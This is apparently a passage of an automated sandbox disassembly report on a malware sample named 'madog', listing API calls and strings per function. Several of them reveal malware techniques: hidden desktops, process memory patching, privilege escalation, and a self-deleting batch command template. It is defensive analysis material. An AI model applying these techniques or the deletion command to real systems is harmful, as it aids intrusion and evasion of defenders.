Part of subcall function 0041AD5F: LeaveCriticalSection.KERNEL32(00423FB4,?,?,?,0041B052,?), ref: 0041AD9D
Part of subcall function 0041AD5F: EnterCriticalSection.KERNEL32(00423FB4,?,?,?,?,0041B052,?), ref: 0041ADAE
Part of subcall function 0041AD5F: LeaveCriticalSection.KERNEL32(00423FB4,?,?,?,0041B052,?), ref: 0041AE47

Strings

, xrefs: 0041B039

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041B58C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30

APIs

InitializeCriticalSection.KERNEL32(00423FE4,76C61857,0040C185,00422360), ref: 0041B5A2
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0041B5DE
GetProcAddress.KERNEL32(PR_SetError), ref: 0041B5F0
GetProcAddress.KERNEL32(PR_GetError), ref: 0041B602

Strings

PR_GetError, xrefs: 0041B5F2
PR_SetError, xrefs: 0041B5E0
PR_GetNameForIdentity, xrefs: 0041B5BE

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00407206, Relevance: 12.2, APIs: 8, Instructions: 180

APIs

Part of subcall function 00416444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00416463
Part of subcall function 00416444: freeaddrinfo.WS2_32(?,?,?,?,?,00407284,?), ref: 004164B0

GetCurrentThread.KERNEL32(00000001,?,00000003,?,?,00000000,?), ref: 004072EB
SetThreadPriority.KERNEL32(00000000), ref: 004072F2

Part of subcall function 0041D865: OpenWindowStationW.USER32(?,00000000,10000000), ref: 0041D88A
Part of subcall function 0041D865: CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 0041D89D
Part of subcall function 0041D865: GetProcessWindowStation.USER32 ref: 0041D8AE
Part of subcall function 0041D865: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0041D8E9
Part of subcall function 0041D865: CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 0041D8FD
Part of subcall function 0041D865: GetCurrentThreadId.KERNEL32(?,?,?,0040731A,?,2937498D,?,00000000), ref: 0041D909
Part of subcall function 0041D865: GetThreadDesktop.USER32(00000000), ref: 0041D910
Part of subcall function 0041D865: SetThreadDesktop.USER32(00000000), ref: 0041D922
Part of subcall function 0041D865: CloseDesktop.USER32(00000000), ref: 0041D934
Part of subcall function 0041D865: CloseWindowStation.USER32(?), ref: 0041D94F

Part of subcall function 0040DD09: TlsAlloc.KERNEL32(00422868,00000000,0000018C,00000000,00000000), ref: 0040DD22
Part of subcall function 0040DD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0040DD4A
Part of subcall function 0040DD09: CreateEventW.KERNEL32(00422C30,00000001,00000000,?,84889912,?,00000001), ref: 0040DD74
Part of subcall function 0040DD09: CreateMutexW.KERNEL32(00422C30,00000000,?,18782822,?,00000001), ref: 0040DD97
Part of subcall function 0040DD09: CreateFileMappingW.KERNEL32(00000000,00422C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0040DDC2
Part of subcall function 0040DD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0040DDD8
Part of subcall function 0040DD09: GetDC.USER32(00000000), ref: 0040DDF5
Part of subcall function 0040DD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 0040DE15
Part of subcall function 0040DD09: GetDeviceCaps.GDI32(?,0000000A), ref: 0040DE1F
Part of subcall function 0040DD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0040DE32
Part of subcall function 0040DD09: ReleaseDC.USER32(00000000,?), ref: 0040DE56
Part of subcall function 0040DD09: CreateMutexW.KERNEL32(00422C30,00000000,?,1898B122,?,00000001,004228B8,?,00000102,004228A4,00422E70,00000010,?,?), ref: 0040DF00
Part of subcall function 0040DD09: GetDC.USER32(00000000), ref: 0040DF15
Part of subcall function 0040DD09: CreateCompatibleDC.GDI32(00000000), ref: 0040DF23
Part of subcall function 0040DD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0040DF3A
Part of subcall function 0040DD09: SelectObject.GDI32(00000000,00000000), ref: 0040DF4D
Part of subcall function 0040DD09: ReleaseDC.USER32(00000000,00000001), ref: 0040DF65

GetShellWindow.USER32 ref: 00407338
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 0040736B

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

WaitForSingleObject.KERNEL32(00000000,00001388), ref: 004073CD
CloseHandle.KERNEL32(?), ref: 004073DD
CloseHandle.KERNEL32(?), ref: 004073E3
SystemParametersInfoW.USER32(00001003,00000000,00000000,00000000), ref: 004073F2

Part of subcall function 0040D4B4: WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,0040E1F1,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 0040D714
Part of subcall function 0040D4B4: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040D72F
Part of subcall function 0040D4B4: ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0040D7C1
Part of subcall function 0040D4B4: GetSystemMetrics.USER32(00000017), ref: 0040D8DB
Part of subcall function 0040D4B4: ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0040DC67

Part of subcall function 0040DF74: DeleteObject.GDI32(00000000), ref: 0040DF87
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040DF97
Part of subcall function 0040DF74: TlsFree.KERNEL32(00000000,00000000,00422868,00000000,0040E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DFA2
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040DFB0
Part of subcall function 0040DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,00422868,00000000,0040E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DFBA
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040DFC7
Part of subcall function 0040DF74: SelectObject.GDI32(00000000,00000000), ref: 0040DFE1
Part of subcall function 0040DF74: DeleteObject.GDI32(00000000), ref: 0040DFF2
Part of subcall function 0040DF74: DeleteDC.GDI32(00000000), ref: 0040DFFF
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040E010
Part of subcall function 0040DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040E01F
Part of subcall function 0040DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0040E038

Part of subcall function 004165B7: recv.WS2_32(?,?,00000400,00000000), ref: 00416600
Part of subcall function 004165B7: send.WS2_32(?,?,00000000,00000000), ref: 0041661A
Part of subcall function 004165B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00416657

Part of subcall function 0041675E: shutdown.WS2_32(?,00000002), ref: 00416766
Part of subcall function 0041675E: closesocket.WS2_32(?), ref: 0041676D

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 004167B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004167CC

Part of subcall function 00416774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004167A7

Part of subcall function 00416403: socket.WS2_32(?,00000001,00000006), ref: 0041640C
Part of subcall function 00416403: connect.WS2_32(00000000,?,-0000001D), ref: 0041642C
Part of subcall function 00416403: closesocket.WS2_32(00000000), ref: 00416437

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040B11C, Relevance: 12.1, APIs: 8, Instructions: 107

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B130
ReleaseMutex.KERNEL32(?), ref: 0040B14F
GetWindowRect.USER32(?,?), ref: 0040B15C
IsRectEmpty.USER32(?), ref: 0040B1E0
GetWindowLongW.USER32(?,000000F0), ref: 0040B1EF
GetParent.USER32(?), ref: 0040B205
MapWindowPoints.USER32(00000000,00000000), ref: 0040B20E
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040B232

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004114C3, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 367

APIs

Part of subcall function 0041433F: CharLowerA.USER32(00000000), ref: 00414420
Part of subcall function 0041433F: CharLowerA.USER32(?), ref: 0041442D

Part of subcall function 00413346: HeapAlloc.KERNEL32(00000008,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?,?), ref: 00413368
Part of subcall function 00413346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?), ref: 00413379

Part of subcall function 00417FE1: StrCmpNIA.SHLWAPI(00000001,nbsp;,00000005), ref: 00418104

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

InternetCrackUrlA.WININET ref: 004117AC
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 004117CA

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

LeaveCriticalSection.KERNEL32(00422AC8,?,?), ref: 0041194D

Part of subcall function 00414660: CryptAcquireContextW.ADVAPI32(00418C87,00000000,00000000,00000001,F0000040,?,00418C87,?,00000030,?,?,?,004191A0,00423EC0), ref: 00414679
Part of subcall function 00414660: CryptCreateHash.ADVAPI32(00418C87,00008003,00000000,00000000,00000030,?,00418C87,?,00000030,?,?,?,004191A0,00423EC0), ref: 00414691
Part of subcall function 00414660: CryptHashData.ADVAPI32(00000030,00000010,00418C87,00000000,?,00418C87), ref: 004146AD
Part of subcall function 00414660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,00418C87), ref: 004146C5
Part of subcall function 00414660: CryptDestroyHash.ADVAPI32(00000030,?,00418C87), ref: 004146DC
Part of subcall function 00414660: CryptReleaseContext.ADVAPI32(00418C87,00000000,?,00418C87,?,00000030,?,?,?,004191A0,00423EC0), ref: 004146E6

GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 004118E4

Part of subcall function 0041763A: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,00419EAB,?,?,00000004), ref: 00417658
Part of subcall function 0041763A: RegSetValueExW.ADVAPI32(00000004,00000004,00000000,?,?,00419EAB,?,?,00419EAB,?,?,00000004,?,00000004), ref: 00417672
Part of subcall function 0041763A: RegCloseKey.ADVAPI32(00000004,?,?,00419EAB,?,?,00000004,?,00000004), ref: 00417681

EnterCriticalSection.KERNEL32(00422AC8), ref: 00411910

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

?*, xrefs: 004114FD

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004063F0, Relevance: 10.7, APIs: 7, Instructions: 216

APIs

Part of subcall function 00412507: CreateMutexW.KERNEL32(00422C30,00000000,?,?,?,?,?), ref: 00412528

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040BB83), ref: 00412635

Part of subcall function 00405ECF: PathRemoveFileSpecW.SHLWAPI(004225D0), ref: 00405F07
Part of subcall function 00405ECF: PathRenameExtensionW.SHLWAPI(00000000,.tmp), ref: 00405F23
Part of subcall function 00405ECF: GetFileAttributesW.KERNEL32(004223C8,004225D0,004225D0,00000000,00020000,004069C9,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 00405F46

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000330,?,?,00000102), ref: 00406538
GetFileAttributesW.KERNEL32(004223C8), ref: 0040654B
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00406571
CloseHandle.KERNEL32(00000000), ref: 0040658F
lstrcmpiW.KERNEL32(?,?), ref: 004065BF
MoveFileExW.KERNEL32(?,?,0000000B), ref: 004065E7

Part of subcall function 00406BD7: RegOpenKeyExW.ADVAPI32(80000001,004227F0,00000000,00000001,?,?), ref: 00406C00

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 00406010: GetTickCount.KERNEL32(0000271B,00020000,00000000,00002719,00020000,00000000,00000000,000000FF,00000000), ref: 0040610F
Part of subcall function 00406010: GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,000000FF,00000000), ref: 00406162
Part of subcall function 00406010: GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,000000FF,00000000), ref: 004061A4
Part of subcall function 00406010: GetUserNameExW.SECUR32(00000002,?,00000104), ref: 004061E6

Part of subcall function 0040680D: WaitForSingleObject.KERNEL32(?,00001388), ref: 0040685A
Part of subcall function 0040680D: Sleep.KERNEL32(00001388,?,?,?,00000000,?,?,-78D0C214,00000002), ref: 00406869

Part of subcall function 00419354: FlushFileBuffers.KERNEL32(00000000), ref: 00419360
Part of subcall function 00419354: CloseHandle.KERNEL32(?), ref: 00419368

Part of subcall function 00418716: SetFileAttributesW.KERNEL32(00000080,00000080,0041B4CD,?), ref: 0041871F
Part of subcall function 00418716: DeleteFileW.KERNEL32(?), ref: 00418729

Part of subcall function 004186EF: GetFileSizeEx.KERNEL32(0041925C,0041925C,?,?,?,0041925C,00000000), ref: 004186FB

WaitForSingleObject.KERNEL32(00007530,?), ref: 0040668B

Part of subcall function 00416B8E: ReleaseMutex.KERNEL32(00000000,00413021,?,?,?), ref: 00416B92

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00417BF7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108

APIs

Part of subcall function 00417BB2: VirtualQueryEx.KERNEL32(000000FF,DB84D88A,?,0000001C,0040C168,DB84D88A,?,?,?,0040BD76,00000000,00000000,00000004,?,?,0040C160), ref: 00417BC7

VirtualProtectEx.KERNEL32(000000FF,0040C160,0000001E,00000040,`#B,0040C158,00000004,?,?,?,?,0040BE97,6A004223,00000000), ref: 00417C24
ReadProcessMemory.KERNEL32(000000FF,0040C160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,0040BE97,6A004223,00000000), ref: 00417C4B
WriteProcessMemory.KERNEL32(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 00417CC5
WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000), ref: 00417CED
VirtualProtectEx.KERNEL32(000000FF,?,0000001E,`#B,`#B,?,?,?,?,0040BE97,6A004223,00000000,?,?,0040C160,00422360), ref: 00417D05

Strings

`#B, xrefs: 00417C17, 00417CF7, 00417CFB, 00417C1A, 00417CFA

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00414E7B, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85

APIs

Part of subcall function 00418737: GetTempPathW.KERNEL32(000000F6,?), ref: 0041874E

CharToOemW.USER32(?,?), ref: 00414EAB
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00414F2F

Part of subcall function 00418716: SetFileAttributesW.KERNEL32(00000080,00000080,0041B4CD,?), ref: 0041871F
Part of subcall function 00418716: DeleteFileW.KERNEL32(?), ref: 00418729

Part of subcall function 0041856B: CreateFileW.KERNEL32(00414E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00418585
Part of subcall function 0041856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004185A8
Part of subcall function 0041856B: CloseHandle.KERNEL32(00000000), ref: 004185B5

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Strings

/c "%s", xrefs: 00414F01
ComSpec, xrefs: 00414F2A
@echo off%sdel /F "%s", xrefs: 00414EBE
bat, xrefs: 00414E8B

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004178D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 004178FD

Part of subcall function 0041773A: CharUpperW.USER32(00000000), ref: 0041785B

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 0041792F
RegCloseKey.ADVAPI32(?), ref: 00417938
RegCloseKey.ADVAPI32(?), ref: 00417952

Strings

SOFTWARE\Microsoft, xrefs: 004178F0
d, xrefs: 00417943

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00414A87, Relevance: 10.6, APIs: 7, Instructions: 52

APIs

GetCurrentThread.KERNEL32(00000020,00000000,0041C9A1,00000000,?,?,?,?,0041C9A1,SeTcbPrivilege), ref: 00414A97
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0041C9A1,SeTcbPrivilege), ref: 00414A9E
OpenProcessToken.ADVAPI32(000000FF,00000020,0041C9A1,?,?,?,?,0041C9A1,SeTcbPrivilege), ref: 00414AB0
LookupPrivilegeValueW.ADVAPI32(00000000,0041C9A1,?), ref: 00414AD4
AdjustTokenPrivileges.ADVAPI32(0041C9A1,00000000,00000001,00000000,00000000,00000000), ref: 00414AE9
GetLastError.KERNEL32 ref: 00414AF3
CloseHandle.KERNEL32(0041C9A1), ref: 00414B02

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00416A3C, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43

APIs

Part of subcall function 00414A87: GetCurrentThread.KERNEL32(00000020,00000000,0041C9A1,00000000,?,?,?,?,0041C9A1,SeTcbPrivilege), ref: 00414A97
Part of subcall function 00414A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0041C9A1,SeTcbPrivilege), ref: 00414A9E
Part of subcall function 00414A87: OpenProcessToken.ADVAPI32(000000FF,00000020,0041C9A1,?,?,?,?,0041C9A1,SeTcbPrivilege), ref: 00414AB0
Part of subcall function 00414A87: LookupPrivilegeValueW.ADVAPI32(00000000,0041C9A1,?), ref: 00414AD4
Part of subcall function 00414A87: AdjustTokenPrivileges.ADVAPI32(0041C9A1,00000000,00000001,00000000,00000000,00000000), ref: 00414AE9
Part of subcall function 00414A87: GetLastError.KERNEL32 ref: 00414AF3
Part of subcall function 00414A87: CloseHandle.KERNEL32(0041C9A1), ref: 00414B02

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00416A5B
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 00416A77
SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 00416A8E
LocalFree.KERNEL32(00000000), ref: 00416A9D

Strings

SeSecurityPrivilege, xrefs: 00416A43
S:(ML;CIOI;NRNWNX;;;LW), xrefs: 00416A56

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040B31C, Relevance: 9.2, APIs: 6, Instructions: 197

APIs

GetAncestor.USER32(?,00000002), ref: 0040B345
SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 0040B370
PostMessageW.USER32(?,00000020,?,00000000), ref: 0040B3B2

Part of subcall function 0040B23D: GetTickCount.KERNEL32 ref: 0040B2A3
Part of subcall function 0040B23D: GetClassLongW.USER32(?,000000E6), ref: 0040B2D8

GetWindowThreadProcessId.USER32(?,00000000), ref: 0040B448
PostMessageW.USER32(?,00000112,?,?), ref: 0040B49B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0040B4DA

Part of subcall function 0040B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B0B3
Part of subcall function 0040B0AD: ReleaseMutex.KERNEL32(?), ref: 0040B0E7
Part of subcall function 0040B0AD: IsWindow.USER32(?), ref: 0040B0EE
Part of subcall function 0040B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040B108
Part of subcall function 0040B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 0040B110

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00409694, Relevance: 9.2, APIs: 6, Instructions: 175

APIs

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00409709
StrStrIW.SHLWAPI(?,?), ref: 00409796
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 004097BE
GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 004097DB
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 0040980C
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 0040982D

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041A3B1, Relevance: 9.2, APIs: 6, Instructions: 153

APIs

EnterCriticalSection.KERNEL32(00423F24), ref: 0041A3C2
LeaveCriticalSection.KERNEL32(00423F24), ref: 0041A425

Part of subcall function 0041A298: ResetEvent.KERNEL32(?), ref: 0041A2A6
Part of subcall function 0041A298: InternetSetStatusCallbackW.WININET(?,0041A24F), ref: 0041A2DB
Part of subcall function 0041A298: InternetReadFileExA.WININET ref: 0041A31B
Part of subcall function 0041A298: GetLastError.KERNEL32 ref: 0041A325
Part of subcall function 0041A298: InternetSetStatusCallbackW.WININET(?,?), ref: 0041A389

EnterCriticalSection.KERNEL32(00423F24), ref: 0041A442
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 0041A4C6

Part of subcall function 0041856B: CreateFileW.KERNEL32(00414E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00418585
Part of subcall function 0041856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004185A8
Part of subcall function 0041856B: CloseHandle.KERNEL32(00000000), ref: 004185B5

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 004154F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00415505
Part of subcall function 004154F1: GetLastError.KERNEL32 ref: 0041550F
Part of subcall function 004154F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0041552F

Part of subcall function 004114C3: InternetCrackUrlA.WININET ref: 004117AC
Part of subcall function 004114C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 004117CA
Part of subcall function 004114C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 004118E4
Part of subcall function 004114C3: EnterCriticalSection.KERNEL32(00422AC8), ref: 00411910
Part of subcall function 004114C3: LeaveCriticalSection.KERNEL32(00422AC8,?,?), ref: 0041194D

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

SetLastError.KERNEL32(00002EE4), ref: 0041A51C
LeaveCriticalSection.KERNEL32(00423F24), ref: 0041A585

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040929D, Relevance: 9.1, APIs: 6, Instructions: 148

APIs

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 004092D4
StrStrIW.SHLWAPI(?,?), ref: 0040935C
StrStrIW.SHLWAPI(?,?), ref: 0040936D
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00409389
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 004093A7
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 004093C1

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00411049, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 395

APIs

